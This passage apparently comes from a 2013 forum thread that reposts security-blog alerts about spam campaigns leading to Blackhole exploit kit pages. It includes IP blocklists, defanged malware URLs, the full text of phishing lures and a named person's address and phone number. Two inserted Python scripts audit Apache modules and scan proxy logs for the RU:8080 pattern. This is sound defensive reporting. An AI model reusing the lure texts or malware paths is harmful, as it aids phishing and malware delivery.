> https://webrootblog.files.wordpress.com/2013/03/web_malware_exploitation_kit_statistics_loads.png
The majority of affected users are U.S.-based hosts, and the majority of infected operating systems are Windows NT 6.1, followed by Windows XP... according to the cybercriminals pitching the kit, they’ve also managed to infect some Mac OS X hosts... competing Web malware exploitation kits tend to exploit a much more diversified set of client-side vulnerabilities, consequently, achieving higher exploitation rates... In the wake of two recently announced Java zero day vulnerabilities, users are advised to disable Java, as well as to ensure that they’re not running any outdated versions of their third-party software and browser plugins."
- http://seclists.org/fulldisclosure/2013/Mar/38
4 Mar 2013 - "... 5 -new- security issues were discovered in Java SE 7..."
___
Fake British Airways SPAM / forum-la .ru
- http://blog.dynamoo.com/2013/03/british-airways-e-ticket-receipts-spam.html
4 March 2013 - "This fake British Airways spam leads to malware on forum-la .ru:
From: LiveJournal.com [do-not-reply @livejournal .com]
Date: 4 March 2013 12:17
Subject: British Airways E-ticket receipts
e-ticket receipt
Booking reference: 9AZ3049885
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 79805156. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
The email has an attachment named E-Ticket-N93892PK.htm which attempts to direct the victim to a malware page at [donotclick]forum-la .ru:8080/forum/links/column.php (report here*) hosted on:
198.104.62.49 (NTT America, US)
210.71.250.131 (Chungwa Telecom, Taiwan)
Blocklist:
198.104.62.49
210.71.250.131
..."
* http://www.urlquery.net/report.php?id=1251838
... Detected suspicious URL pattern
___
iFrame injections drive traffic to Blackhole exploit kit
- http://nakedsecurity.sophos.com/2013/03/05/rogue-apache-modules-iframe-blackhole-exploit-kit/
March 5, 2013 - "... recent attacks against legitimate websites that are being used to drive unsuspecting user traffic to the Blackhole exploit sites. JavaScript libraries on the legitimate websites are prepended with code... SophosLabs has seen huge volumes of legitimate sites being compromised in this way in recent weeks. In fact, Mal/Iframe-AL has been the most prevalent web threat detected on customer endpoints and web appliances for the past few weeks, accounting for almost 30% of all detected web threats! If we correlate our malicious URL data against the Alexa top million site data, you can see that these Mal/Iframe-AL injections account for almost two-thirds of all popular sites... have been compromised in some way over the past week.
> https://sophosnews.files.wordpress.com/2013/03/al_alexa.png?w=640
... Looking at data collected over the past 14 days (Feb 18th - March 4th 2013), I started off by looking at the host ISPs for the compromised web sites. As you can see below, a good spread of ISPs have been hit (368 in total), with 18 of them accounting for approximately half of all infected sites.
> https://sophosnews.files.wordpress.com/2013/03/al_isps.png?w=640
Looking at the countries hosting the affected web servers shows the expected spread, somewhat reflective of where hosting providers are based.
> https://sophosnews.files.wordpress.com/2013/03/al_country.png?w=640
If we take a look at the web server platform, the compromised sites are almost exclusively running Apache. This is in contrast to the 60% or so we would expect* if the attacks were agnostic to the platform.
> https://sophosnews.files.wordpress.com/2013/03/al_platform.png?w=640
Most of these servers are running CentOS (then Debian then Ubuntu). This last piece of data gives us some clues as to how these attacks are happening. Could it be a rogue Apache module being used to inject the redirect into content as it is delivered from the server? There have been several other recent attacks doing this. Digging around it appears that this is indeed the root cause. The folks over at Sucuri** managed to get hold of the rogue module that was used on one such victim server.
Administrators or owners of sites that have been affected by these attacks should therefore check their Apache configuration as a matter of urgency and look out for unexpected modules being loaded..."
* http://news.netcraft.com/archives/2012/12/04/december-2012-web-server-survey.html
** http://blog.sucuri.net/2013/02/web-server-compromise-debian-distro-identify-and-remove-corrupt-apache-modules.html
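The check Sophos recommends above (look for unexpected Apache modules) can be scripted. This is an added example, not code from Sophos or Sucuri: it parses LoadModule directives from an httpd.conf and asks dpkg or rpm whether each module file is owned by an installed package; the config fragment and the rogue module name are constructed, and the package-manager lookup is injectable so the parser can be exercised offline.

```python
import os
import re
import shlex
import subprocess

# Constructed httpd.conf fragment (not from the page). The last LoadModule stands in
# for a module dropped on the server outside of any package; the name is a placeholder.
SAMPLE_CONF = """\
ServerRoot "/etc/httpd"
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule ssl_module modules/mod_ssl.so
# constructed example of an attacker-dropped module, not shipped by any package
LoadModule example_rogue_module /usr/lib64/httpd/modules/mod_example_rogue.so
"""

LOADMODULE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.M)
SERVERROOT = re.compile(r"^\s*ServerRoot\s+(\S+)", re.M)


def loaded_modules(conf_text, default_root="/etc/httpd"):
    """Return [(module_name, absolute_path)] for every LoadModule directive.

    Relative paths are resolved against ServerRoot, as httpd itself does.
    """
    m = SERVERROOT.search(conf_text)
    root = shlex.split(m.group(1))[0] if m else default_root
    modules = []
    for name, path in LOADMODULE.findall(conf_text):
        path = shlex.split(path)[0]          # strip surrounding quotes, if any
        if not os.path.isabs(path):
            path = os.path.join(root, path)
        modules.append((name, os.path.normpath(path)))
    return modules


def package_owner(path):
    """Ask dpkg, then rpm, which package owns path; None if no package claims it.

    Assumes one of the two tools is present (Debian/Ubuntu or CentOS, the
    platforms named in the Sophos data). Only the first tool found is consulted.
    """
    for cmd in (["dpkg", "-S", path], ["rpm", "-qf", path]):
        try:
            r = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
        except FileNotFoundError:
            continue                          # tool not installed, try the next one
        if r.returncode == 0:
            return r.stdout.strip().split(":")[0]
        return None                           # tool present, file unowned
    return None


def audit(conf_text, owner_lookup=package_owner):
    """Return the names of loaded modules whose .so is not owned by any package."""
    return [name for name, path in loaded_modules(conf_text)
            if owner_lookup(path) is None]


if __name__ == "__main__":
    # Against the constructed config only the placeholder rogue module is reported
    # when the two packaged paths are owned; on a live host run
    # audit(open("/etc/httpd/conf/httpd.conf").read()) instead.
    for name in audit(SAMPLE_CONF):
        print("module not owned by any package:", name)
```

Ownership alone does not catch a packaged module that was overwritten in place; follow up with `rpm -V <package>` or `dpkg --verify <package>` on the packages that own the Apache modules.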
___
Something evil on 5.9.196.3 and 5.9.196.6
- http://blog.dynamoo.com/2013/03/something-evil-on-591963-and-591966.html
5 March 2013 - "Two IPs in the 5.9.196.0/28 block that you probably want to avoid are 5.9.196.3 and 5.9.196.6. The first of these IPs is being used in an injection attack (in this case via [donotclick]frasselt-kalorama .nl/relay.php) leading to two identified malware landing pages:
[donotclick]kisielius.surfwing .me/world/explode_conscious-scandal.jar (report here*)
[donotclick]alkalichlorideasenteeseen.oyunhan .net/world/romance-apparatus_clinical_repay.php (report here**)
Domains visible on 5.9.196.3 include:
...
A few IPs along is 5.9.196.6 which hosts the following domain that also looks highly suspect:
inspegrafstatkakukano.creatinaweb .com
Blocking these domains completely is probably a good idea:
...
5.9.196.0/28 is a Hetzner IP*** ... I haven't seen anything of value in this /28, blocking it may be prudent."
* http://www.urlquery.net/report.php?id=1248746
... Zip archive data
** http://www.urlquery.net/report.php?id=1265212
... Adobe PDF Memory Corruption
*** https://www.google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 6823 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-03-04, and the last time suspicious content was found was on 2013-03-04..."
___
Fake HP printer SPAM / giliaonso .ru
- http://blog.dynamoo.com/2013/03/scan-from-hewlett-packard-scanjet-spam.html
5 Mar 2013 - "This fake HP printer spam leads to malware on giliaonso .ru:
Date: Tue, 5 Mar 2013 12:53:40 +0500
From: "Classmates . com" [classmatesemail @accounts.classmates .com]
Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #161051
Attachments: HP_Scan.htm
Attached document was scanned and sent
to you using a HP A-16292P.
SENT BY : Landon
PAGES : 6
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
The attachment leads to malware on [donotclick]giliaonso .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
46.4.77.145 (Hetzner, Germany)
198.104.62.49 (NTT America, US)
210.71.250.131 (Chungwa Telecom, Taiwan)
Blocklist:
46.4.77.145
198.104.62.49
210.71.250.131 ..."
* http://urlquery.net/report.php?id=1266289
... Detected suspicious URL pattern... Blackhole 2 Landing Page 210.71.250.131
___
Fake Sendspace SPAM / forumkianko .ru
- http://blog.dynamoo.com/2013/03/sendspace-spam-forumkiankoru.html
5 Mar 2013 - "This fake Sendspace spam leads to malware on forumkianko .ru:
Date: Tue, 5 Mar 2013 06:52:10 +0100
From: AyanaLinney@ [redacted]
Subject: You have been sent a file (Filename: [redacted]-51153.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-01271.pdf, (797.4 KB) waiting to be downloaded at sendspace.(It was sent by DEON VANG).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]forumkianko .ru:8080/forum/links/column.php (report here*) hosted on:
46.4.77.145 (Hetzner, Germany***)
198.104.62.49 (NTT America, US)
210.71.250.131 (Chungwa Telecom, Taiwan)
These IPs are the same as used in this attack**..."
* http://urlquery.net/report.php?id=1267580
... Detected suspicious URL pattern... Blackhole 2 Landing Page 46.4.77.145
** http://blog.dynamoo.com/2013/03/scan-from-hewlett-packard-scanjet-spam.html
*** https://www.google.com/safebrowsing/diagnostic?site=AS:24940
:mad:
AplusWebMaster
2013-03-06, 19:16
FYI...
Fake BT SPAM / ginagion .ru
- http://blog.dynamoo.com/2013/03/bt-business-direct-order-spam-ginagionru.html
6 March 2013 - "This fake BT spam leads to malware on ginagion .ru:
From: Bebo Service [mailto:service=noreply.bebo .com@bebo .com] On Behalf Of Bebo Service
Sent: 05 March 2013 21:22
Subject: BT Business Direct Order
Notice of delivery
Hi,
We're pleased to confirm that we have now accepted and despatched your order on Wed, 6 Mar 2013 03:21:30 +0600.
Unless you chose a next day or other premium delivery service option, then in most cases your order will arrive within 1-3 days. If we despatched your order via Letterpost, it may take a little longer.
***Please note that your order may have shipped in separate boxes and this means that separate consignment numbers may be applicable***
We've despatched...
..using the attached shipment details...
Courier Ref Carriage method
Royal Mail FM320725534 1-3 Days
Please note that you will only be able to use this tracking reference once the courier has scanned the parcel into their depot. Please allow 24 hours from the date of this email before tracking your parcel online.
For information on how track your delivery, please follow to attached file.
Important information for Yodel deliveries:
If your consignment number starts with 3S3996956 your delivery will require a signature. If there is no-one at the delivery address to sign for the goods a card will be left containing the contact details of the courier so that you can re-arrange delivery or arrange a collection.
The malicious payload is at [donotclick]ginagion .ru:8080/forum/links/column.php ... hosted on:
41.72.150.100 (Hetzner, South Africa)
117.104.150.170 (NTT, Japan)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
117.104.150.170
212.180.176.4
gosbfosod .ru
giliaonso .ru
forum-ny .ru
ginagion .ru ..."
___
Pizza SPAM / gimalayad .ru
- http://blog.dynamoo.com/2013/03/pizza-spam-gimalayadru.html
6 Mar 2013 - "... This spam actually leads to malware on gimalayad .ru:
Date: Wed, 6 Mar 2013 12:22:04 +0330
From: Tagged [Tagged @taggedmail .com]
Subject: Fwd: Order confirmation
You've just ordered pizza from our site
Pizza Ultimate Cheese Lover's with extras:
Drinks
- Grolsch x 6
- 7up x 3
- Budweiser x 4
- Carling x 2...
If you haven't made the order and it's a fraud case, please follow the link and cancel the order.
CANCEL ORDER NOW!
If you don't do that shortly, the order will be confirmed and delivered to you...
Total Charge: 232.33$
========
Date: Wed, 6 Mar 2013 09:16:56 +0100
From: "Xanga" [noreply @xanga .com]
Subject: Re: Fwd: Order confirmation
You've just ordered pizza from our site
Pizza Ultimate Cheese Lover's with extras:
- Beef
- Pepperoni...
- Extra Sauce
Pizza Italian Trio with extras:
- Beef
- Black Olives...
Drinks
- Simply Orange x 4
- Fanta x 2
- 7up x 2
- Heineken x 2
- Lift x 5
- Pepsi x 4
- Budweiser x 4
Total Charge: 242.67$
If you haven't made the order and it's a fraud case, please follow the link and cancel the order.
CANCEL ORDER NOW!
If you don't do that shortly, the order will be confirmed and delivered to you.
With Respect
PIERO`s Pizzeria
The malicious payload is at [donotclick]gimalayad .ru:8080/forum/links/column.php (report here*) hosted on the same IPs used in this attack:
41.72.150.100 (Hetzner, South Africa)
117.104.150.170 (NTT, Japan)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
117.104.150.170
212.180.176.4 ..."
* http://www.urlquery.net/report.php?id=1289205
... Detected suspicious URL pattern... Blackhole 2 Landing Page 212.180.176.4
___
Fake Intuit email
- http://security.intuit.com/alert.php?a=76
3/06/13 - "People are receiving fake emails with the title 'Please respond - overdue payment.' These mails are coming from auto-invoice @quickbooks .com, which is -not- a legitimate email address. Below is a copy of the email... The email does not contain a link; however, the email has a .zip attachment that contains malware. Do not open the .zip file.
Please find attached your invoices for the past months. Remit the payment by 02/25/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Earline Robles
This is the end of the fake email.
Steps to Take Now:
- Do -not- open the attachment in the email...
- Delete the email..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Malicious Attachment E-mail Messages - March 06, 2013
Fake Unpaid Debt Invoice E-mail Messages - March 06, 2013
Fake Overdue Payment Notification E-mail Messages - March 06, 2013
Fake Employee Document Sharing Notification E-mail - March 06, 2013
Fake Money Transfer Notification E-mail Messages - March 06, 2013
Fake UPS Payment Document Attachment E-mail Messages - March 06, 2013
(Links and more info at the cisco URL above.)
:mad:
AplusWebMaster
2013-03-07, 16:19
FYI...
Fake BBB SPAM / alteshotel .net and bbb-accredited .net
- http://blog.dynamoo.com/2013/03/bbb-spam-alteshotelnet-and-bbb.html
7 Mar 2013 - "This fake BBB spam leads to malware on alteshotel .net and bbb-accredited .net:
Date: Thu, 7 Mar 2013 06:23:12 -0700
From: "Better Business Bureau Warnings" [hurriese3 @bbb .com]
Subject: BBB details regarding your claim No.
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust ©
Thu, 6 March 2013
Your Accreditation Suspended
[redacted]
The Better Business Bureau has been temporary Aborted Your Accreditation
A number of latest complains on you / your company motivated us to temporal Abort your accreditation with Better Business Beaureau. The details of the our decision are available for review at a link below. Please pay attention to this issue and inform us about your glance as soon as possible.
We graciously ask you to overview the TERMINATION REPORT to meet on this claim
-We awaits to your prompt rebound- .
If you think you got this email by mistake - please forward this message to your principal or accountant
Yours respectfully
Hunter Ross
Dispute Advisor
Better Business Bureau
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 25501
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This information was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
========
Date: Thu, 7 Mar 2013 21:19:18 +0800
From: "Better Business Bureau Warnings" [prettifyingde7 @transfers.americanpayroll .org]
Subject: BBB details about your pretense No.
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust ©
Thu, 6 March 2013
Your Accreditation Suspended
[redacted]
The Better Business Bureau has been temporary Aborted Your Accreditation
A number of latest complains on you / your company motivated us to transient Cancell your accreditation with Better Business Beaureau. The details of the our decision are available visiting a link below. Please pay attention to this question and notify us about your belief as soon as possible.
We graciously ask you to visit the ABUSE REPORT to answer on this appeal
- We awaits to your prompt answer. -
If you think you got this email by mistake - please forward this message to your principal or accountant
Faithfully yours
Benjamin Cox
Dispute Councilor
Better Business Bureau
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 24401
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This letter was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
One potentially malicious payload is at [donotclick]alteshotel .net/detects/review_complain.php (looks like it might be broken - report here*) hosted on:
69.43.161.176 (Parked at Castle Access Inc, US)
The other is at [donotclick]bbb-accredited .net/kill/enjoy-laws-partially-unwanted.php (definitely malicious - report here**) hosted on:
64.207.236.198 (EasyTEL, US)
142.11.195.204 (Hostwinds LLC, US)
149.154.68.214 (TheFirst.RU, Russia) ...
Recommended blocklist:
64.207.236.198
142.11.195.204
149.154.68.214..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1302657
** http://urlquery.net/report.php?id=1302670
... Detected live BlackHole v2.0 exploit kit
___
Malware sites to block 7/3/13
- http://blog.dynamoo.com/2013/03/malware-sites-to-block-7313.html
7 March 2013 - "Some Cridex-based nastiness here. These are the malicious domains that I can find on the IPs mentioned, alternatively you can just block:
173.246.102.2 (Gandi, US)
173.255.215.242 (Linode, US)
64.13.172.42 (Silicon Valley Colocation, US)
Blocklist:
173.246.102.2
173.255.215.242
64.13.172.42 ..."
(Long list at the dynamoo URL above.)
:mad::fear:
AplusWebMaster
2013-03-08, 16:02
FYI...
Fake Adobe CS4 SPAM / guuderia .ru
- http://blog.dynamoo.com/2013/03/adobe-cs4-spam-guuderiaru.html
8 March 2013 - "This fake Adobe spam leads to malware on guuderia .ru:
From: messages-noreply@bounce .linkedin .com [mailto:messages-noreply@bounce .linkedin .com] On Behalf Of Donnie Cherry via LinkedIn
Sent: 07 March 2013 12:39
Subject: Order N40898
Good afternoon,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]guuderia .ru:8080/forum/links/column.php (report here*) hosted on:
41.72.150.100 (Hetzner, South Africa)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
212.180.176.4
..."
* http://urlquery.net/report.php?id=1318046
... Detected suspicious URL pattern... Blackhole 2 Landing Page 212.180.176.4
___
Fake IRS SPAM / gimilako .ru
- http://blog.dynamoo.com/2013/03/your-tax-return-appeal-is-declined.html
8 March 2013 - "The following fake IRS spam leads to malware on gimilako .ru:
From: Myspace [mailto:noreply@message .myspace .com]
Sent: 07 March 2013 20:55
Subject: Your tax return appeal is declined.
Dear Chief Account Officer,
Hereby you are notified that your Income Tax Refund Appeal id#9518045 has been REJECTED. If you believe the IRS did not properly estimate your case due to a misunderstanding of the facts, be prepared to provide additional information. You can obtain the rejection details and re-submit your appeal by using the instructions in the attachment.
Internal Revenue Service
Telephone Assistance for Businesses:
Toll-Free, 1-800-829-4933
Hours of Operation: Monday Friday, 7:00 a.m. 7:00 p.m. your local time (Alaska & Hawaii follow Pacific Time).
The malicious payload is at [donotclick]gimilako .ru:8080/forum/links/column.php (reported here*) hosted on:
41.72.150.100 (Hetzner, South Africa)
89.107.184.167 (WebhostOne, Germany)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
89.107.184.167
212.180.176.4
..."
* http://urlquery.net/report.php?id=1321924
... Detected suspicious URL pattern... Blackhole 2 Landing Page 89.107.184.167
___
Fake LinkedIn SPAM / giminalso .ru
- http://blog.dynamoo.com/2013/03/linkedin-spam-giminalsoru.html
8 March 2013 - "This fake LinkedIn spam leads to malware on giminalso .ru:
From: messages-noreply@bounce. linkedin .com [mailto:messages-noreply@bounce .linkedin .com] On Behalf Of LinkedIn Password
Sent: 08 March 2013 10:24
Subject: Aylin is now part of your network. Keep connecting...
[redacted], Congratulations!
You and Aylin are now connected.
Aylin Welsh
Tajikistan
2012, LinkedIn Corporation
The malicious payload is at [donotclick]giminalso .ru:8080/forum/links/column.php (report here*) hosted on the same IPs as in this other attack** today:
41.72.150.100 (Hetzner, South Africa)
89.107.184.167 (WebhostOne, Germany)
212.180.176.4 (Supermedia, Poland)"
* http://urlquery.net/report.php?id=1322125
... Detected suspicious URL pattern... Blackhole 2 Landing Page 41.72.150.100
** http://blog.dynamoo.com/2013/03/your-tax-return-appeal-is-declined.html
___
Fake AT&T spam (again)
- http://blog.dynamoo.com/2013/03/at-spam-again.html
8 Mar 2013 - "This fake AT&T spam leads to malware on.. well, in this case nothing at all.
Date: Fri, 8 Mar 2013 10:37:24 -0500 [10:37:24 EST]
From: AT&T Customer Care [icare7@amcustomercare .att-mail .com]
Subject: Your AT&T wireless bill is ready to view
att.com | Support | My AT&T Account Rethink Possible
Your wireless bill is ready to view
Dear Customer,
Your monthly wireless bill for your account is now available online.
Total Balance Due: -$1695.64-
Log in to myAT&T to view your bill and make a payment. Or register now to manage your account online. By dialing *PAY (*729) from your wireless phone, you can check your balance or make a payment - it's free.
Smartphone users: download the free app to manage your account anywhere, anytime.
Thank you,
AT&T Online Services ...
> https://lh3.ggpht.com/-9r2z1zqGRKg/UToRQZlYDAI/AAAAAAAABAY/V8WMW3duxJc/s1600/att-bill-2.png
In this case the link goes to a redirector page at [donotclick]vtcrm.update .se/eben/index.html hosted 62.109.34.50 in Sweden. It looks like someone has speedily removed the redirector page so I can't tell you much about the malicious landing page. Kudos to Ilait AB or whoever fixed the problem!"
___
RU:8080 and Amerika SPAM runs
- http://blog.dynamoo.com/2013/03/ru8080-and-amerika-spam-runs.html
8 March 2013 - "For about the past year I have seen two very persistent spam runs leading to malware, typically themed along the lines of fake emails from the BBB, LinkedIn, NACHA, USPS and ADP. The most obvious characteristic of one of the spam runs is the use of a malware landing page containing .ru:8080, registered through NAUNET to the infamous "private person". In order to aid researchers, I have labelled this series as RU:8080*. You can see some current nastiness in action at Malware Must Die**. But there's a second spam run as well, which appears to be similarly themed but using different servers. In this case, the domains registered are typically .net, .org and .com emails (with .pro and .biz used from time-to-time). These domains are registered with fake names and addresses purporting to be in the US, but indicators show that this spam may well originate from within Russia. I've labelled this series as Amerika***... The Amerika spam run is a little harder to identify, so there may be some errors in it. I don't have any deep insight into either spam run or the payloads they deliver, but if you are interested in looking more deeply at the patterns then hopefully this will be of some use!"
* http://blog.dynamoo.com/search/label/RU%3A8080
** http://malwaremustdie.blogspot.co.uk/2013/03/ru8080columnphp-hey-stealer-what-do-you.html
March 5, 2013
*** http://blog.dynamoo.com/search/label/Amerika
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Electronic Payment Cancellation E-mail Messages - 2013 Mar 08
Fake Business Complaint E-mail Messages - 2013 Mar 08
Fake Italian Online Dating Request E-mail Messages - 2013 Mar 08
Fake Portuguese Payment Invoice E-mail Messages - 2013 Mar 08
Fake Portuguese Banking Service Notification E-mail Messages - 2013 Mar 08
(Links and more detail at the cisco URL above.)
:mad:
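Added example, not code from dynamoo or any of the quoted posts: a small Python pass that applies the RU:8080 indicator described above (a .ru host on port 8080 serving /forum/links/column.php) together with the three IPs listed for giminalso .ru to proxy log lines, and emits a deny-list from the hits. The log format and the hostnames in the sample lines are constructed for the example; only the path and the three IPs come from the posts above.

```python
"""RU:8080 landing-page triage over proxy logs (added example, not from the posts above)."""
import re
from urllib.parse import urlsplit

# Indicator quoted in the posts above: <something>.ru:8080/forum/links/column.php
RU8080_PATH = "/forum/links/column.php"
# IPs listed for giminalso .ru in the LinkedIn item above.
KNOWN_BAD_IPS = {
    "41.72.150.100",   # Hetzner, South Africa
    "89.107.184.167",  # WebhostOne, Germany
    "212.180.176.4",   # Supermedia, Poland
}
RU_HOST = re.compile(r"^(?:[a-z0-9-]+\.)+ru$", re.IGNORECASE)

# Constructed log lines (format and hostnames are invented for this example):
# <ISO time> <client IP> <method> <URL>
SAMPLE_LOG = """\
2013-03-08T10:31:02Z 10.0.0.15 GET http://ru8080-sample.ru:8080/forum/links/column.php
2013-03-08T10:31:05Z 10.0.0.15 GET http://www.example.com/index.html
2013-03-08T10:32:40Z 10.0.0.22 GET http://41.72.150.100/forum/links/column.php?x=1
2013-03-08T10:33:11Z 10.0.0.22 GET https://mail.example.org/owa/
2013-03-08T10:35:59Z 10.0.0.31 GET http://other-sample.net:8080/forum/links/column.php
"""


def classify_url(url):
    """Label a URL by the RU:8080 indicators, or return None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        port = parts.port  # None when no explicit port
    except ValueError:     # malformed port in the log line
        return None
    if host in KNOWN_BAD_IPS:
        return "known-bad-ip"
    if port == 8080 and parts.path == RU8080_PATH:
        # The .ru + 8080 + path triple is the documented pattern; the same
        # path on a non-.ru host is still worth a look, so label it separately.
        return "ru8080-landing" if RU_HOST.match(host) else "ru8080-path-other-tld"
    return None


def scan_log(text):
    """Return one dict per log line that matches an indicator."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        when, client, _method, url = fields[:4]
        label = classify_url(url)
        if label is not None:
            hits.append({"time": when, "client": client, "url": url, "label": label})
    return hits


def build_blocklist(hits):
    """Distinct hosts/IPs seen in hits plus the known IPs, sorted for a deny-list."""
    hosts = {urlsplit(h["url"]).hostname for h in hits}
    return sorted(hosts | KNOWN_BAD_IPS)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["client"]} {h["label"]:22} {h["url"]}')
    print("blocklist:", ", ".join(build_blocklist(found)))
```

The path-only match on a non-.ru host is kept as a separate label rather than dropped, because the same gang's domains are described above as rotating while the path stays fixed; a client that hits it is worth pulling from the wire either way.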
AplusWebMaster
2013-03-11, 19:41
FYI...
Something evil on 37.59.214.0/28
- http://blog.dynamoo.com/2013/03/something-evil-on-3759214028.html
11 March 2013 - "37.59.214.0/28 is an OVH IP range* suballocated to a person called Sidharth Shah in Maryland (more of whom later). At the moment it is hosting a number of malware sites with a hard-to-determine payload such as [donotclick]55voolith .info:89/forum/had.php which is evading automated analysis**. The owner of this block is as follows:
organisation: ORG-SS252-RIPE
org-name: Shah Sidharth
org-type: OTHER
address: 12218 Skylark Rd
address: 20871 Clarksburg
address: US
abuse-mailbox: ovhresell @gmail .com
phone: +1.5407378283
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
source: RIPE # Filtered
Malware is hosted on 37.59.214.0, 37.59.214.1 and 37.59.214.0. There do not appear to be any legitimate sites in this range. Google has already flagged some of these as malicious (marked in red), so you can safely assume that they are all malicious..."
(List at the dynamoo URL above.)
** http://urlquery.net/report.php?id=1368280
AS16276 (OVH)
* https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 6134 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-03-11, and the last time suspicious content was found was on 2013-03-11... Over the past 90 days, we found 911 site(s) on this network... that appeared to function as intermediaries for the infection of 2222 other site(s)... We found 1665 site(s)... that infected 8762 other site(s)..."
___
Something evil on 176.31.140.64/28
- http://blog.dynamoo.com/2013/03/something-evil-on-176311406428.html
11 March 2013 - "176.31.140.64/28 is an OVH block suballocated to Sidharth Shah (mentioned in this earlier post)*. It contains a small number of malicious domains flagged by Google (in red), most of the rest of the sites have a very poor WOT rating (in yellow). I'll post more details later. You can safely assume that everything in this block is malicious, and I note that some of the domains are refugees from this malware site.
Malware is hosted on 176.31.140.64, 176.31.140.65, 176.31.140.66 and 176.31.140.67. There appear to be no legitimate sites in this block..."
(List at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/03/something-evil-on-3759214028.html
___
Sidharth Shah / OVH / itechline .com
- http://blog.dynamoo.com/2013/03/sidharth-shah-ovh-itechlinecom.html
11 March 2013 - "I have now come across several incidents of malware hosted in an OVH IP address range suballocated to Sidharth Shah. The blocks that I can identify so far are:
5.135.20.0/27
5.135.27.128/27
5.135.204.0/27
5.135.218.32/27
5.135.223.96/27
37.59.93.128/27
37.59.214.0/28
46.105.183.48/28
91.121.228.176/28
94.23.106.224/28
176.31.106.96/27
176.31.140.64/28
178.32.186.0/27
178.32.199.24/29
188.165.180.224/27
These IPs are mostly malware or fake goods. Legitimate sites seem to be nonexistent, although these IP ranges have hosted legitimate sites in the past. I would personally recommend blocking them all, but if you want to see a fuller analysis of WOT ratings and Google Safe Browsing diagnostics see here*...
The email address sidharth134 @gmail .com is also associated with itechline .com which is a company with an unenviable F rating from the BBB, who list the principal as being Sidharth Shah. BBB rating is based on 16 factors.
Factors that lowered the rating for ITechline.com include:
Length of time business has been operating
8 complaints filed against business
Failure to respond to 7 complaints filed against business
> https://lh3.ggpht.com/-D1aA_fdVk64/UT3z3gGLveI/AAAAAAAABAo/ouAPVZ07ays/s1600/itechline.png
... ITechline.com has garnered some very negative consumer reviews..."
* http://www.dynamoo.com/files/sidharth-shah.csv
___
Fake Wire Transfer SPAM / gimikalno .ru
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-gimikalnoru.html
11 Mar 2013 - "This fake wire transfer spam leads to malware on gimikalno .ru:
Date: Mon, 11 Mar 2013 04:00:22 +0000 [00:00:22 EDT]
From: Xanga [noreply@xanga .com]
Subject: Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 16442CU385)
Dear Bank Account Operator,
WIRE TRANSFER: FED62403611378975648
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]gimikalno .ru:8080/forum/links/column.php (report here*) hosted on:
5.9.40.136 (Hetzner, Germany)
66.249.23.64 (Endurance International Group, US)
94.102.14.239 (Netinternet, Turkey)
Blocklist:
5.9.40.136
66.249.23.64
94.102.14.239
212.180.176.4
117.104.150.170
41.72.150.100 ..."
* http://urlquery.net/report.php?id=1371618
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.102.14.239
:fear::mad:
AplusWebMaster
2013-03-12, 15:32
FYI...
Fake BofA emails lead to malware
